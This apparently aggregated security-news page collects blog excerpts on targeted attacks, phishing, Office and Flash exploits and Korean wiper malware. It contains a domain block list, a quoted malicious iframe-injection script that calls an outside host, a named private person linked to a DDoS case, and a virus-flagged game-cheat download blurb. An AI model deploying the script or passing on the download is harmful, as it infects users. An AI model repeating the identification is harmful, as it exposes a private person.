Computer Security Articles

Here at Trend Micro, we have seen all kinds of cybercrime and digital threats. For the first-ever Cybersecurity Awareness Day in Singapore, one of my colleagues, Richard Sheng, has taken time out to explain what so-called “Advanced Persistent Threats” (a.k.a. APT) are. Singapore is one of the first Asian countries to come up with a strong cybersecurity agenda. As such, advanced persistent threats have captured the interest of its security practitioners.

How Advanced Persistent Threats Typically Work

The use of the term “advanced persistent threats” perhaps helps people grasp how sophisticated attacks staged by groups that intend to and are capable of targeting a specific organization are. Attacks under the umbrella term “advanced persistent threats” usually take longer to plan and execute as well as utilize a variety of tools compared with typical malware attacks that are relatively uncontrolled and do not criticize in terms of target.

Staging attacks classified as advanced persistent threats involves detailed reconnaissance work to gather information and to identify a particular target’s system and infrastructure weaknesses. To do this, attackers may rely on publicly available information, including data found in the target’s website or in its social networking accounts. This allows them to get a better idea on who in the company they should target as their attack’s point of entry. The information they gather includes employees’ names and their personal details (e.g., email addresses, social networking profiles, etc.) as well as the company’s IT policies, preferred OS, applications, software, and network structure.

Next, the attackers obtain access to their target’s system through ingenious social engineering ploys. At this point, the malware, as an attack tool, is executed. It then performs malicious payloads like information theft or denial of service (DoS) without being found out. Covering their tracks is thus very important because the attackers must stay under the radar until they get what they want (e.g., data theft, backdoor program installation). The malware they use should also have the ability to communicate with them in order to transmit information or intelligence.

Do Advanced Persistent Threats Really Depart from the Typical Attack Model?

From a security practitioner’s viewpoint, using the term “advanced persistent threats” to describe what we prefer to call “highly targeted attacks” does not help our cause to empower organizations to protect themselves against these threats.

In most cases, while highly targeted attacks are indeed persistent, in that these manage to intentionally stay undetected and while successfully executing their intended payload, these are hardly as advanced as the term “advanced persistent threats” suggests. As my colleague Paul Ferguson puts it, “Most of the targeted attacks that work are indeed persistent yet still build upon the usual weak link—the social engineering ploy where a human gets duped.” Take the following as examples:

• Google presented its findings at a security conference last year regarding the Aurora/HYDRAQ attack, revealing that, “a Google employee received a link from a person they trusted and instantly clicked on it, sending them to a malicious website, which downloaded malware”
• RSA revealed in a blog entry that the attackers in the breach suffered by the company sent two different phishing emails to employees, the subject heading reading “2011 Recruitment Plan”

What You Can Do to Prevent, Detect and Clean These Threats

• User Awareness on Security Best Practices and Policies – Create memorable and effective campaigns in-house that instill proper behavior in employees with regard to security.
• Multilayered Protection – Employ firewall, vulnerability assessment tools/devices, endpoint protection, data loss prevention solutions (since information is often the targeted asset), network scanning/management (since the attack tool needs to communicate with its owner), ideally with support.
• Patch Management – Stay informed on news about malware that exploit vulnerabilities, keep all OSs and applications updated with the latest versions and patches.
• Data Backup – Always back up sensitive information. Also, administrators are encouraged to use back-up and restore features or any solution that can restore any machine at any given time.
• Malware infection remediation – Use a solid security product that performs cleanup of malware traces and system modifications.

Thanks to my colleague Edgardo Diaz, Jr. for additional inputs on the above.

Post from: TrendLabs | Malware Blog – by Trend Micro

Highly Targeted Attacks and the Weakest Links

When Adobe warned customers earlier this week about a newly discovered vulnerability in the Flash Player software, company officials said that there were already attacks underway against the bug. Those attacks are using malicious Flash files buried in Word documents and Microsoft’s security engineers have analyzed the exploits and found some interesting details.

This is the second serious Flash vulnerability in recent weeks that attackers have targeted through the use of malicious Office files. In a previous round of attacks, hackers were going after an earlier Flash zero day with rigged Excel files. This time, Microsoft officials said, not only is the bug different, but so is the attack. Though both attacks use malicious Office files to trick users, the details are dissimilar.

The attack presents to the user via a spam message, often with a subject line referencing the Fukushima nuclear disaster, and carrying a malicious Word document as an attachment.

“Once a user opens the document, Flash Player will load the malicious
file and exploitation will occur. Unlike the previous vulnerability, a
bug in the ActionScript Virtual Machine version 1 is now used in the
exploitation process. Another difference is that this is not a result of
fuzzing clean files. We won’t disclose any detail on what triggers the
vulnerability, for security reasons, obviously,” Marian Radu, Daniel Radu and Jaime Wong of the Microsoft Malware Protection Center wrote in an analysis of the Flash exploit attempts.

“In order to exploit this vulnerability the attackers packaged the
AVM1 code inside an AVM2 based Flash file. The latter is embedded inside
the Word document and assigned with setting up the exploitation
environment. Initially the AVM2 code constructs a heap-spray buffer made of a NOP-sled.”

The next step is the construction of the shellcode, which in turn then loads the Flash exploit code inside the Flash Player.

“The AVM1 code that triggers this vulnerability is loaded as a separate
SWF file, converted from a hex-encoded embedded string and executed,” the researchers said.

The shellcode performs some other tasks, as well, including installing a benign Word document on the compromised machine as a way of hiding the original malicious file.

This attack method is essentially the one that the attackers used to compromise RSA last month and steal some data related ot the company’s SecurID product line.

The injection attacks from lizamoon.com and other domains continue.. and they link back to a popular blog post about a very different attack site at worid-of-books.com because at the moment, all these sites appear to be on the same server at 95.64.9.18 belonging to Intermedia TOP SRL.

The following sites are on that malicious server:
alexblane.com
alisa-carter.com
lizamoon.com
t6ryt56.info
tadygus.com
worid-of-books.com

Right now the safest thing to do is block traffic to 95.64.8.0/23 (95.64.8.0 – 95.64.9.255) at the very least. But given that there are several bad networks now within the mostly Romanian 95.64.0.0/16, there’s very little to lose in blocking the whole /16 for now if you don’t have dealings with Romania.

If you need to block by domain, then the list below is everything that I can identify in this block.

abrogatesdv.info
antiviric.net
atlaty.com
atydut.com
bancard.cc
blasphemysfhs.info
blatant8jh.info
blightedgf5.info
bru67.info
buroti.com
cra76.info
cre12.info
crediblegfj.info
creditablef8.info
credulousaw99d.info
der93.info
enigmafhdd.info
enscond4xc.info
enshroudgf32b.info
fif49.info
fileac.com
financeprogramm.com
fop22.info
fre94.info
harbingersytu.info
hastenr55a.info
haughtinessd2f.info
itapos.com
ivo17.info
jer77.info
jev41.info
kia31.info
kie14.info
laby5nehfs.info
laceration24.info
lachrymose78n.info
lev66.info
lsrato.com
machmit.cc
mag20.info
memhys.com
mia16.info
mineral-beauty.net
morafu.com
mupoga.com
muposs.com
nlosaf.com
nuzzlefgf.info
nwolbcom.cc
nyb90.info
obduratexv.info
obfuscate98y.info
onfiro.com
online-security.cc
opa63.info
ova22.info
pes89.info
plauditaz.info
plethoradtb.info
podyme.com
poisor.com
posjuc.com
posunn.com
prettyharp.ru
qertys.com
reprieve8mf.info
scoolq.com
ser55.info
servat.cc
serwaz.com
testaz.cc
tmwars.com
usudom.com
xxxpornteensex.com
advancedwebanalytic.com
alexblane.com
alisa-carter.com
alternative-art-ltd.net
alternativeart-ltd.com
artmarket-llc.net
artsolveltd.cc
artsolveltdco.at
astech-groupde.cc
blitznet-de.eu
chelpgroup-llc.net
chepl-groupllc.biz
competitor-uk-group.net
competitorgroup-ltd.com
ddk100.com
ddk2200.com
deemno.com
drakulaworld.net
drysdale-antcorp.at
drysdale-group-inc.cc
findsubstantial.org
foto-album-mnck.tk
fotoshare-2dknc.com
google-1aa.com
googlesite.ws
joomlaext.org
kunde.ws
lizamoon.com
mailwbg6.com
micr0updates.com
myblog-search.com
ocservice-de.net
oregon-ltd-uk.net
qead-llc.biz
saleoke.com
squit-group-llc.biz
surprise-knsma.tk
surprise-knsmd.tk
surprise-knsmf.tk
surprise-knsmo.tk
surprise-knsmp.tk
surprise-knsmq.tk
surprise-knsmr.tk
surprise-knsms.tk
surprise-knsmt.tk
surprise-knsmu.tk
surprise-knsmw.tk
t6ryt56.info
tadygus.com
worid-of-books.com

Malware attacks that exploit vulnerabilities in popular software in order to compromise specific target sets are becoming increasingly commonplace.  Prior to the highly publicized “Aurora” attack on Google and at least twenty other companies, targeted malware attacks had been taking place and they continue to affect government, military, corporate, educational and civil society networks. While such attacks against the US government and related networks are well known, other governments and an increasing number of companies are facing similar threats.

Earlier this year, the Canadian, South Korean and French governments have all had serious security breaches to sensitive networks. Recently, the European Commission and the External Action Service were also compromised. There have also been acknowledged security breaches at the security firms RSA and Comodo which—at least in the case of RSA—appear to be the result of targeted malware attacks.

Technically sophisticated or simply well-executed?

Such attacks are almost always described as sophisticated or targeted, adjectives which have basically become synonymous with successful. The statements issued after breaches often suggest that attackers knew exactly what to exploit and, in some cases, exactly what they were looking for. It is difficult to assess such claims based solely on the murky details that emerge publicly. Therefore I am not suggesting that such characterizations are necessarily incorrect. Rather, I am suggesting that the level of targeting and sophistication are results of prior knowledge gained by the attackers and not necessarily caused by some technical brilliance in the tools and methods used.

While most Internet users will never be victims of targeted attacks and are more likely to face common threats such as fake security software (FAKEAV) and banking Trojans (Zeus, SpyEye), there continues to be a steady stream of malware samples that are linked to targeted attacks. However, the actual level of targeting varies considerably. There are some malicious actors that generate more “noise” than others. While they do send out malicious documents, often leveraging specific themes and issues for social engineering, they are received by a relatively large number of potential targets. They are certainly not targeted to the level of an individual or even an organization. However, such attacks may simply be the precursor to much more specific, targeted attacks.

Laying the groundwork

A recent sample, which I received via contagiodump.blogspot.com, illustrates the level of reconnaissance that “noisy” attackers can generate. The malware sample was a .CHM file that exploits Microsoft HTML Help. The malware, which is detected by Trend Micro as CHM_CODEBASE.AG, drops BKDR_SALITY.A and proceeds to generate network traffic with well-known BKDR_SALITY.A servers.

However, the malware made another set of network connections to win{BLOCKED}.dyndns.info. The Web page accessed on this server contains JavaScript code that uses the res:// protocol to enumerate the specific software on the compromised computer and submits the listing to win{BLOCKED}.dyndns.info. This method of using the res:// protocol to enumerate installed software was documented by Billy Rios in 2007. Rios explains that the res:// protocol, which was built into Internet Explorer since version 4.0, can be used to remotely detect specific software present on a computer by simply getting a user to visit a Web page from a browser. As Rios notes, this technique can be used to identify specific applications in order to select an appropriate exploit. It can also be used to detect the presence of specific drives. Years later, this technique is still effective.

The script at win{BLOCKED}.dyndns.info detects an extensive list of software:

• Microsoft Office (Word and Outlook) from Windows 97 through to 2010
• Adobe Reader (7.0 to 9.3)
• Adobe Flash
• Java
• Instant messaging programs (Skype, Yahoo! Messenger, MSN, Google Talk, and QQ)
• Programming and graphics tools (Delphi, .net, Photoshop and Dreamweaver)

It also checks for file sharing programs, Web browsers, remote administration tools, email clients, download managers and media players. Security software are also detected including major antivirus products and personal firewalls, as well as the PGP encryption software. In addition, it checks for virtual machine software and tries to detect if it is within VMware. Finally, it checks for Microsoft updates from KB842773 through to KB981793.

This malware sample is admittedly odd because it conducts these checks after the user’s computer is already compromised. If this were being used for profiling, wouldn’t it have been done before the attack? One possible explanation is that the attackers are deliberately sending out “noisy” attacks with the hopes that administrators would simply clean compromised systems and move on. However, by then the attackers would have a profile of the machines in an organization that was compromised. They will know the preferred antivirus products, the specific versions of installed software and other information they can use to stage a targeted attack in the future. When the attackers are ready, they will stage an attack aimed at acquiring specific data. The attackers will know exactly what versions of what software to exploit in order to compromise the target. The attack will be characterized as sophisticated and targeted because prior information about the organization has helped make the attack successful.

Post from: TrendLabs | Malware Blog – by Trend Micro

How Sophisticated are Targeted Malware Attacks?

There has been quite a bit of news recently about distributed denial of services (DDoS) attacks against a number of South Korean websites. About 40 sites– including the Presidential, National Intelligence Service, Foreign Ministry, Defense Ministry, and the National Assembly–were targeted over the weekend, beginning around March 4 at 10 a.m. Korean time. These assaults are similar to those launched in 2009 against sites in South Korea and the United States and although there is no direct evidence connecting them so far, they do bear some similarities.

DDoS attacks have occurred with more and more frequency, but one of the things that makes this attack stand out is its use of destructive payloads. Our analysis of the code used in the attack shows that when a specific timezone is noted by the malware it destroys the infected computer’s master boot record. If you want to destroy all the data on a computer and potentially render it unusable, that is how you would do it.

The malware in the Korean attacks employs an unusual command and control (C&C) structure. Instead of receiving commands directly from its C&C servers, the malware contacts two layers of servers. The first layer of C&C servers is encoded in a configuration file that can be updated at will by the botnet owner. These C&C servers simply provide a list of servers in the second layer, which will provide additional instructions. Looking at the disbursement of the first-layer C&Cs gives us valuable insight into the malware’s global footprint. Disbursement across this many countries increases resilience to takedowns. (Click on chart for details.)

This is further supported because the list of first-layer servers can be updated at any time.

The red code blocks deal with contacting the first-layer C&C server, the green code blocks retrieve the list of the second-layer servers, and the blue code blocks handle file downloads from the second-layer servers.

Botnets of infected computers usually receive commands directly and carry out the nefarious intent of their controllers. In this case, however, the C&C application behaves more like a downloader. Instead of directly interpreting commands, the application simply downloads files to the local hard disk. Secondary malware components that run independently of the main service find these files and then evaluate their contents to carry out an attack.

The two layers make it harder to analyze the malware because an analyst must understand many components and cannot simply follow the code flow within one malware binary. However, forensics are easier because in postmortem we can identify which task files have been created on an infected computer.

The malware in its current incarnation was deployed with two major payloads:

• DDoS against chosen servers
• Self-destruction of the infected computer

Although the DDoS payload has already been reported elsewhere, the self-destruction we discussed earlier in this post is the more pressing issue.

When being installed on a new computer, the malware records the current time stamp in the file noise03.dat, which contains the amount of days this computer is given to live. When this time is exceeded, the malware will:

• Overwrite the first sectors of all physical drives with zeroes
• Enumerate all files on hard disk drives and then overwrite files with specific extensions with zeroes

The service checks for task files that can increase the time this computer is allowed to live, so the botmaster can keep the botnet alive as long as needed. However, the number of days is limited to 10. Thus any infected computer will be rendered unbootable and data will be destroyed at most 10 days after infection! To protect against tampering, the malware will also destroy all data when the system time is set before the infection date.

The list of file extensions that will be overwritten is particularly interesting. It contains typical document data:

• doc, docx, docm
• xls, xlsx
• pdf, eml (Outlook Email)

The list also contains some programming-language file extensions, such as c, cpp, h, and java. Wonder what they thought would be on the infected machines? Or did they already know?

One thing is clear: This is a serious piece of malware. It uses resilience techniques to avoid a takedown and even has destructive capabilities in its payload. This year is quickly shaping up to be a period of serious attacks and escalations on the cyberfrontier.

We have noticed a lot of SMS-based web-phishing attacks in China targeting the Bank of China’s online users. They received a phishing SMS that is designed to look like it was sent by the bank as a reminder to its customers: “Dear user, your token has expired, please visit http://www.boc**.com to reactivate your token.” The URL is similar to the bank’s official website but points to a phishing site that looks almost like the original bank website.

On this bogus phishing website, there is a button on the top right that says “Upgrade your token.”

Once the user clicks this button, it redirects to a page that looks like the normal online-banking login page. The criminals will get all the info they need to steal money from the victim’s account: user ID, password, and token.

This information is used immediately to transfer the victim’s money into the attacker’s account before the token expires.

A lot of technologies–including tokens, certificates, dongles, etc.–are designed specifically to protect against phishing. But even though Bank of China uses tokens to enhance security, customers still need to take care to prevent this type of phishing attack.

Many readers will have seen the press around a series of attacks that have been labelled the ‘Operation Night Dragon’ attacks by McAfee. In this post I will attempt to answer some of the more common questions we have been receiving from customers on this topic.

What is the Night Dragon attack?
To date, there has not been a specific family of malware known as ‘Night Dragon’. Instead, the term has been used to label a series of attacks against various organisations since November 2009, all of which have followed a similar modus operandi. In the McAfee report, the attacks were described to be targeted, using techniques such as social engineering and spear phishing. The purpose of the attacks appears to be penetration of corporate networks in order to extract sensitive data.

How do these attacks work?
The attacks use a variety of components – there is no single piece or family of malware responsible.

The first stage of the attack involves penetration of the target network, ‘breaking down the front door’ if you like. Techniques such as spear phishing and SQL injection of public facing web servers are reported to have been used. Once in, the attackers then upload freely available hacker tools onto the compromised servers in order to gain visibility into the internal network. The internal network can then be penetrated by typical penetration methods (accessing Active Directory account details, cracking user passwords etc) in order to infect machines on the network with remote administration tools (RATs).

Am I protected against these attacks?
There are several components used in these attacks, many of which are available from Chinese hacker web sites. As such, there are various detection names associated with this threat. From the details shared thus far around the binaries believed to be involved in these attacks, most of the core components are detected by Sophos products as Mal/Generic-L.

For clarity, we have since published the Troj/NDragon-A and Mal/NDragon-A detections to group the various components together, the latter genotype detection providing generic detection for other variants that are likely to be in the wild.

Detection for some other components used in the attacks has been added as Troj/Redsip-A and Mal/Redsip-A.

The available details suggest that in addition to the above malware, various legitimate tools were used in the attacks (e.g. SysInternals tools). Sophos customers are able to use potentially unwanted application (PUA) and application control (AppC) detections to fully manage the use of such tools within their environment. These tools can include software that is legitimate, but that you really do not want to allow being run on your network (for example, IP scanning, password recovery and remote administration tools).

The one thing clear from the Night Dragon attacks, is that the use of PUA and AppC detections should not be dismissed. Using these types of technology to help manage what is allowed to run on your network can clearly provide a real security benefit.

Are these attacks targeted?
Again, at this point, we can only speculate based on the information provided in the report. It could well be that the attacks are targeted against specific organisations. Equally, could it be the case that widespread networks have been hit in a similar fashion? That the high profile organisations listed are just the ones where the attack has actually been detected and reported? After all, we are more than familiar with SQL injection techniques being used in an automated fashion to compromised large numbers of web servers.

Why is it important if the attacks were targeted or not? In my opinion, it is a matter of perception. It is important that we do not regard this type of attack as likely to only ever be targeted against high profile, large organisations. All organisations should learn from this report and ensure they have adequate layered protection across their network. User education is important as well – to avoid social engineering providing the route through the front door.

Is this related to Operation Aurora?
I am sure some will speculate that it is! (Just don’t mention the S*****t word!) The truth is, without further information about the source of the attacks it is impossible to tell whether the Night Dragon attacks are related to Aurora at all. The style of attack may be similar (breach the perimeter using whatever means necessary, and then penetrate the internal network to find and extract the required data), but we cannot read too much into what is a very standard form of attack.

Concluding comments
The bottom line from this report is that all organisations must take note of the risk that today’s cybercriminals can pose. The report reflects not so much a single piece of sophistication, in either attack methodology or malware. Instead it emphasizes the persistent and coordinated attacks of organised groups against specific organisations, with the goal of extracting sensitive data.

The truth is that this week is no different to last – there is no new outbreak, vulnerability or risk of infection. Instead, the attacks illustrate the background crimeware menace that all organisations face.

The scarcity principle, popularized in Robert Cialdini’s book Influence: Science and Practice, dictates that people assign more value to opportunities that are less available. Scammers take advantage of this psychological tendency when social engineering victims on-line.

Time Limitation

A classic illustration of the scarcity principle used for persuasion is the situation where the offer has an expiration date. You’ve probably seen this in action at a local store, where signs exclaimed “Hurry! Sales ends Saturday!”

How do scammers replicate this scenario on line? In an earlier post I described a “Home Income Kit” scam, which attempted to persuade victims to pay for a kit that would allow them to make thousands of dollars per month without much effort. The scam used numerous social-engineering techniques. One of them was the scarcity principle in this form:

The scarcity principle suggested that people were more likely to purchase the kit before the (bogus) promotion offer was about to expire.

Another illustration of the time limitation igniting the sense of urgency among victims is the scam that directed people to a fraudulent website under the guise that Facebook will be disabling unconfirmed accounts today. (This scam was reported by Graham Cluley.)

Obstacle Restriction

Building upon the scarcity principle, Cialdini described research showing that “the act of limiting access to a message causes individuals to want to receive it more.” In other words, the forbidden fruit tastes sweeter.

I noticed this principle being used as part of an on-line scam that Jerome Segura described, discussing a link to a malicious executable that was sent via email. When the victims clicked the link, they were made to wait a minute:

After that, they had to solve a CAPTCHA challenge before finally being allowed to obtain the file. The more obstacles the victim had to bypass, the more he or she wanted the file:

Similar use of the scarcity principle occurs when victims are told that they need to install a missing plug-in or update Flash Player to see the desired content. Not being able to get the content immediately makes people want it even more. Unfortunately, they end up installing a trojan horse in the process.

We can consider the scarcity principle playing a role in the success of phishing scams, which present the victim with a logon screen before the person can access the needed data. The human brain will see the logon screen as an obstacle that’s restricting access to the desired item, and will motivate the person to provide the username and password to bypass the restriction.

Why the Scarcity Principle Works

According to Cialdini, one of the reasons the scarcity principle works is because “things that are difficult to attain are typically more valuable.” As the result, humans use the availability of an item as a heuristic for assessing its quality. Second, “as things become less accessible, we lose freedoms. According to psychological reactance theory, we respond to the loss of freedoms by wanting to have them.”

Now that you know about the scarcity principle, be weary of the situations where someone is trying to use it to persuade you to take an action. Also, consider discussing this tendency and the examples of relevant scams as part of your security awareness training.

If you found this post interesting, take a look at my other writing on social engineering, including Faux-Targeted Attacks and the Magic of Cold Reading.

— Lenny Zeltser

A new attack on Twitter users has been arriving as spam with a phishing link. It appears as a notification about an unread message from Twitter Support with a subject line such as “Twit 73-923.” The ending number can vary. The body of the message includes “You have [some number of] delayed message(s) from Twitter” and a link to a phishing site.

If you receive one of these emails, make sure to check where the link points to before clicking on it. To visit a page such as this (or any page even), it’s much safer to manually type the web address instead of clicking a link in an email. Links can easily be faked!

Users without protection who click on any of these links could infect their PCs or reveal their Twitter credentials.

We recommend you take advantage of either or both of McAfee’s TrustedSource™ reputation system and SiteAdvisor Technology to protect yourself against malicious phishing attacks and the sites that host them.

Tweet, search and surf safely out there!

View full post on McAfee Avert Labs

Here's a somewhat novel social engineering attack, flagged by John Leyden in The Register: a voicemail phishing scam (vishing, if you must) that threatens victims with heavy fines and even imprisonment as a result of their visiting the Wikileaks site. The attacker leaves a message including a number victims are supposed to ring to sort … Read More.

Full story: ESET ThreatBlog

During my regular reading on the main feeds on information security this week, I found a small and particular news that, I consider, invites us to think about it. It turns out that according to a post by Mickey Boodaei, CEO of Trusteer, mobile phones users are three times more likely to become victims of … Read More.

Full story: ESET ThreatBlog

Microsoft today turned to a new defensive measure to help users ward off ongoing attacks exploiting a known bug in IE.

Full story: Computerworld Security News

Reuters – A powerful virus targeting smart phones in China running Google Inc’s Android operating system may represent the most sophisticated bug to target mobile devices to date, security researchers said on Thursday.

Full story: Yahoo! News: Security News

Microsoft’s Malware Protection Center has observed malware in the wild which exploits a recently-patched vulnerability in Microsoft Office. This vulnerability is especially dangerous because it can be exploited, in some configurations, just by reading an e-mail.

The malware comes in the form of a specially-crafted RTF file which exploits CVE-2010-3333, one of the vulnerabilities patched in MS10-087, part of the November Patch Tuesday. CVE-2010-3333 is an RTF Stack Buffer Overflow Vulnerability. RTF data is handled by Microsoft Word and Outlook users can set Word to be their e-mail reader in Outlook. In such a configuration, if a malicious e-mail contains RTF data which exploits the vulnerability, it can trigger simply by reading the e-mail.

The vulnerability can also be triggered by attaching a malicious RTF file to an e-mail and convincing the user to download and open the RTF file. The Microsoft description of this attack, which they designate Exploit:Win32/CVE-2010-3333, implies that it uses a separate file, but is not completely clear on the matter.

The description goes into great detail of how the exploit triggers and executes shell code, but the user experience of the attack is unmentioned. Thus there is nothing specific to look for.

The best advice for users to avoid this attack is to make sure you have successfully installed MS10-087. It’s reasonable to expect that anti-malware products, such as Microsoft’s, contain or will soon contain definitions for specific instances of this attack.

Full story: Security Watch

Last November, Microsoft released security bulletin MS10-087, which addresses a number of critical vulnerabilities in how Microsoft Office parses various office file formats. One of them is CVE-2010-3333, “RTF Stack Buffer Overflow Vulnerability,” which could lead to remote code execution via specially crafted RTF data. A few days before Christmas, we received a new sample (sha1: cc47a73118c51b0d32fd88d48863afb1af7b2578) that reliably exploits this vulnerability and is able to execute malicious shellcode which downloads other malware.

The vulnerability can be triggered by utilizing a specially crafted RTF file with a size parameter that is bigger than the expected one. The vulnerability is present in Microsoft Word. It attempts to copy RTF data to the stack memory without validating the size, which will lead to overwriting the stack. 

Figure 1.10 

After executing the code in figure 1.10, the stack memory is overwritten by first part of the shellcode. The challenge for the exploit writer here is to make sure that the shellcode gets control and is executed. In this sample, one of the return addresses was overwritten by another address, which can be found in any known DLL loaded in the memory. That address contains a single piece of code, “Jmp ESP”, that  transfer the control to the stack memory containing our first shellcode.

Let’s take a look at the first shellcode: 

Figure 1.20 

The code above uses a brute-force method to find the second shellcode entry-point by searching for the string “pingping” starting from hardcoded address 0×500000. To avoid causing exceptions while parsing these memory pages, it checks if the page is accessible by calling NtAccessCheckAndAuditAlarm() via Int 2Eh – passing EAX = 2h (NtAccessCheckAndAuditAlarm system call ordinal) and passing the page address in EDX. It returns STATUS_ACCESS_VIOLATION to EAX if the page is not accessible. 

The second shellcode starts by decrypting the rest of the codes and string using a XOR operation with constant keys. It retrieves the address of the needed APIs, downloads the malware from a remote location, and then executes it. In our sample, it attempts to download a file named svchost.exe and saves it as <system folder>\a.exe (detected as Trojan:Win32/Turkojan.C). 

Microsoft detects this exploit as Exploit:Win32/CVE-2010-3333.

We recommend customers that have not yet installed the security update MS10-087 to do so at their earliest convenience.

For reference, here’s a list of some SHA1s we’ve seen related to these targeted attacks:

• 00d9af54c5465c28b8c7a917c9a1b1c797b284ab
• 24ee459425020ea61a10080f867529ea241c51dc
• 2e6abd663337c76379ae26b8aa6cf4db98137b64
• 77637eccf9011d420cccc520bcb3ed0cf907dc00
• CC47A73118C51B0D32FD88D48863AFB1AF7B2578

– Rodel Finones

Full story: Microsoft Malware Protection Center

Attackers have often targeted specific geographical regions, or,
conversely, spared certain regions from their attacks. A recent example
is the following JavaScript found on a malicious web page:

var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
    if(siteUrl.indexOf(arydomain[i]) > -1){
        tmpdomain = 1;
        break;
    }
}
if(tmpdomain == 0) {
    document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}

The code checks the location of the current document. If the domain
does not contain the strings .gov.cn or .edu.cn, then the attack is
launched (by dynamically creating an iframe tag), otherwise the script
performs no action.

Certainly not new, but still interesting…

– on Marco’s Blog

The loosely-knit Anonymous hacker group Friday called its attacks against perceived foes of WikiLeaks a symbolic protest. – on Computerworld Security News

Police in the Netherlands have arrested a second teenager in relation to the pro-WikiLeaks distributed denial-of-service attacks seen earlier this week.

The arrest of the 19-year-old man follows Friday’s attacks on websites belonging to Dutch Police and national prosecutor’s office, which were themselves widely seen as retaliation against the apprehension the day before of a 16-year-old Dutch boy alleged to have participated in “Anonymous” pro-WikiLeaks attacks against a number of websites, including MasterCard and PayPal.

Prosecutors claim that the 19-year-old, from Hoogezand-Sappemeer, in the north east of the Netherlands, flooded the prosecutor’s website with internet traffic:

"From behind his computer, the man used hacker software to flood the website of the prosecutor’s office with as much digital traffic as possible. Investigations by the National Police Services Agency showed that the man, who was active under the internet nickname Awinee, urged other internet users to participate in the attack."

However, it is reported that the DDoS attack software being used did not hide the IP address of the computer involved, making it easy for high-tech crime cops to identify where the attack was coming from.

That’s a pretty silly mistake to make if you’re going to attack the website of your country’s national prosecutor.

Who is “Awinee”? Well, a quick search on Google found a gaming website of a guy who lives in Hoogezand-Sappemeer, is 19 years old, and uses the online nickname “Awinee”, going by the real name of Martijn Gonlag:

Of course, that may just be coincidence. Wikipedia says 34,000 people live in the Hoogezand-Sappemeer municipality, and maybe plenty of the 19-year-olds there use that online nickname.

Denial-of-service attacks are illegal in many countries, and in The Netherlands can result in a maximum sentence of six years in jail.

Prosecutors claim that the man also participated in a DDoS attack against the website Moneybookers.com, which took the website offline for a period of time on Friday. Moneybookers.com terminated its relationship with WikiLeaks in August.

The ongoing saga of WikiLeaks is, of course, a controversial one that is generating strong emotions on both sides. Even if you feel strongly that WikiLeaks is being persecuted or abandoned by online companies think very carefully before volunteering your PC and engaging in a DDoS attack.

After all, it could be that the police are knocking on your door next.

One in every eight malware attacks occurs via a USB device, often targeting the Windows AutoRun function, according to security vendor Avast Software. – on Computerworld Security News

Recently, at Websense Security Labs, we have seen Facebook being used to
display phishing pages for different services, as well as to redirect
to phishing pages hosted elsewhere. Below are two examples of what
the phishing attempts look like…

…(read more) – Patrik Runald on Security Labs

Check out this quick demonstration of what’s new in Fidelis XPS, including reputational feeds from Fidelis and Cyveillance! Read the whitepaper: goo.gl
Video Rating: 5 / 5

This video taken from http://www.youtube.com/watch?v=jf2C_MyJ53s. As well as any other video found on this site is not hosted here, it just embedded, and it taken randomly by our system from video hosting services like YouTube, Metacafe, and others. Therefore, we are not responsible for any copyright violations, video materials, hacking cracking activities, or any other. If you have any legal issues, please contact the appropriate host site.

I Do Not Own This Game It Is CopyRighted To Jagex Game Studios. Requirments: NetFrameWork 1.1 Or Higher Combat Level Of 50+ Not The Top 1000 people Post A Comment www.mediafire.com Link To Download www.mediafire.com Virus Scanned Results: a-squared 14/04/2009 4.0.0.32 – Avira AntiVir 7.1.3.49 8.1.2.12 – Avast 090414-0 4.8.1229 – AVG 270.11.57/2059 8.0.0.0 – BitDefender 16/04/2009 7.0.0.2555 – ClamAV 14/04/2009 0.93.1.0 – Comodo 1113 3.8 – Dr.Web 16/04/2009 5.0 – Ewido 16/04/2009 4.0.0.2 – F-PROT 6 20090415 4.4.4.56 – G DATA 19.3655 2.0.7309.847 – IkarusT3 14/04/2009 1001044 – Kaspersky 16/04/2009 8.0.0.357 – McAfee 14/04/2009 5.1.0.0 virus or variant New Malware Malware Hash Registry 16/04/2009 N/A – NOD32 v3 4011 3.0.677 – Norman 2009/04/14 5.92.08 – Panda 07/02/2009 9.5.1.00 – QuickHeal 15 April, 2009 10.0 – Solo Antivirus 16/04/2009 8.0 – Sophos 16/04/2009 4.32.0 – TrendMicro 965(596500) 1.1-1001 – VBA32 16/04/2009 3.12.0.300 – VirusBuster 10.102.44 1.4.3 -
Video Rating: 3 / 5

This video taken from http://www.youtube.com/watch?v=i0x8CLBLSEg. As well as any other video found on this site is not hosted here, it just embedded, and it taken randomly by our system from video hosting services like YouTube, Metacafe, and others. Therefore, we are not responsible for any copyright violations, video materials, hacking cracking activities, or any other. If you have any legal issues, please contact the appropriate host site.

It didn't take long for attackers to take advantage of the big news that Prince William and Kate Middleton are getting married. As we have explained before, attackers have the process down to a science. They monitor breaking news, trending topics, and buzz words, then automatically manipulate search results based on what's happening in the world. Websense customers are protected against this attack through our Advanced Classification Engine.

As we discussed in our 2010 Threat Report, searching for news and buzz words is now more dangerous than searching for adult content, with approximately 22.4% of all searches for current news leading to malicious search results. And that's in the top 100 results!

The result when clicking on one of the malicious links is exactly the same as with last week's Veteran's Day scams. As always, make sure you go to reputable sites when looking for news. Don't just do random searches.

Source: Security Labs

There were some very pecular goings on in Twitter land today, as the account of Kirsty Allsopp seemed to be taking potshots at Sir Alan Sugar:

Click to Enlarge

The only problem? She didn’t post that message, despite a bit of confusion and the fact that the pair of them had a very public argument recently.

It seems like it might be an easy thing to work out: so far, the compromiser is apparently making all of their posts from an iPhone.

Not so long ago, her account was hijacked and started sending out iPad spam. Methinks this time around she’ll be lucky not to get a “You’re fired” from Sir Alan…

Christopher Boyd

View full post on Sunbelt Blog

““Input validation is not a great solution for [web application] injection attacks. First, input validation is typically done when the data is received, before the destination is known. That means that we don’t know which characters might be significant in the target interpreter. Second, […] applications must allow potentially harmful characters in. For example, should poor Mr. O’Malley be prevented from registering in the database simply because SQL considers ’ a special character?””

– An excerpt from XSS (Cross Site Scripting) Prevention Cheat Sheet by Jeff Williams and Jim Manico

View full post on Lenny Zeltser on Information Security